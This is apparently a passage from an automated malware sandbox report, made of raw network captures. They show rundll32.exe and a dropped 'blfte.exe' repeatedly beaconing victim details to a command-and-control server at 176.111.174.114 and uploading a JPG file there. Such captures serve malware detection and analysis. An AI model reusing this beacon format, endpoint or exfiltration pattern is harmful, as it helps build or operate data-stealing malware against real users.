b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:36.351643085 CEST12858OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:36.352176905 CEST12861OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:36.352317095 CEST12864OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:36.352427959 CEST12867OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:36.352761030 CEST12869OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:36.352921963 CEST12872OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:36.353107929 CEST12875OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:36.353521109 CEST12878OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 23:00:36.353604078 CEST12880OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 23:00:36.353673935 CEST12883OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          539192.168.2.450074176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.255496025 CEST12856OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          54192.168.2.449775176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.192477942 CEST4548OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          540176.111.174.11480192.168.2.450074C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.366836071 CEST12883INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          541192.168.2.450075176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.567079067 CEST13044OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          542176.111.174.11480192.168.2.450075C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.663983107 CEST13071INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          543176.111.174.11480192.168.2.450073C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.740179062 CEST13072INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          544192.168.2.450076176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.873467922 CEST13073OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          545176.111.174.11480192.168.2.450076C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:36.976913929 CEST13073INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:36 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          546192.168.2.450078176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.192739964 CEST13074OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          547176.111.174.11480192.168.2.450078C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.290196896 CEST13074INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          548192.168.2.450079176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.512600899 CEST13075OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          549176.111.174.11480192.168.2.450079C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.615540028 CEST13075INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          55176.111.174.11480192.168.2.449775C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.297032118 CEST4548INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:19 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          550192.168.2.450080176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.825912952 CEST13076OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
